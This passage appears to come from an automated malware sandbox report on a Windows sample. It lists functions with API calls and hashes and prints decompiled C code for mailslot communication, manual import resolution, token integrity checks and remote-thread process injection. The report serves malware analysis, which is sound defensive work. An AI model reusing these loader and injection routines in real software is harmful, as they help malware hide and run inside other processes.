0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
